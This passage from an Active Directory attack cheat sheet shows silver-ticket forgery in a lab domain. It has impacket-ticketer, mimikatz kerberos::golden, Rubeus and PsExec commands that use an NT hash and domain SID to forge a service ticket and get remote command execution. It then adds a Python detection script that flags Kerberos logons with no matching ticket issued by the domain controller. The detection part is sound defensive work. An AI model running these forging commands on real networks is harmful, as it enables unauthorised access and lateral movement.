Silver ticket
Create a ticket for a specific service
silver (nthash + sid + username + password)
Linux
impacket-ticketer -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs/labwws02.jurassic.park stegosaurus
export KRB5CCNAME=/root/stegosaurus.ccache
impacket-psexec jurassic.park/stegosaurus@labwws02.jurassic.park -k -no-pass
Execution is similar to PTT attacks, but in this case the ticket is created manually. After that, as usual, the ticket can be referenced through the KRB5CCNAME environment variable and used with the -no-pass -k parameters in any of the impacket examples.
Windows
.\mimikatz.exe
privilege::debug
kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park
exit
.\Rubeus.exe ptt /ticket:ticket.kirbi
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
Additionally, the Mimikatz module kerberos::ptt can be used to inject the ticket instead of using Rubeus, as shown in the PTT attack section.
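From the defender's side, a ticket created manually as described above never passes through the KDC, so the Kerberos network logon it produces on the target host has no matching service-ticket request on the domain controllers. The following is an added example, not part of the original page, that correlates the two; the record fields, timestamps and the triceratops account are constructed, and the 10-hour window assumes the default maximum service-ticket lifetime.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real logs). Fields are simplified stand-ins
# for event 4769 on the domain controllers and event 4624 on the target host.
DC_4769 = [
    {"time": "2024-05-01T08:10:00", "account": "triceratops", "service_host": "labwws02"},
]
HOST_4624 = [
    {"time": "2024-05-01T09:00:07", "host": "labwws02", "account": "triceratops",
     "logon_type": 3, "package": "Kerberos"},
    {"time": "2024-05-01T11:30:00", "host": "labwws02", "account": "stegosaurus",
     "logon_type": 3, "package": "Kerberos"},
    {"time": "2024-05-01T11:45:00", "host": "labwws02", "account": "stegosaurus",
     "logon_type": 3, "package": "NTLM"},
    {"time": "2024-05-01T19:00:00", "host": "labwws02", "account": "triceratops",
     "logon_type": 3, "package": "Kerberos"},
]

# Assumption: default AD maximum service-ticket lifetime (600 minutes).
MAX_TICKET_LIFETIME = timedelta(hours=10)


def _ts(value):
    return datetime.fromisoformat(value)


def logons_without_issued_ticket(host_events, dc_events, lifetime=MAX_TICKET_LIFETIME):
    """Return Kerberos network logons with no KDC-issued service ticket in range."""
    issued = {}
    for ev in dc_events:
        key = (ev["account"].lower(), ev["service_host"].lower())
        issued.setdefault(key, []).append(_ts(ev["time"]))
    suspicious = []
    for ev in host_events:
        if ev["logon_type"] != 3 or ev["package"] != "Kerberos":
            continue  # only Kerberos network logons are in scope here
        when = _ts(ev["time"])
        key = (ev["account"].lower(), ev["host"].lower())
        # A legitimate ticket was issued before the logon and is still valid.
        if not any(timedelta(0) <= when - t <= lifetime for t in issued.get(key, [])):
            suspicious.append(ev)
    return suspicious


if __name__ == "__main__":
    for hit in logons_without_issued_ticket(HOST_4624, DC_4769):
        print(hit["time"], hit["host"], hit["account"])
```

Treat hits as leads rather than verdicts: missing logs from any one domain controller produce the same gap.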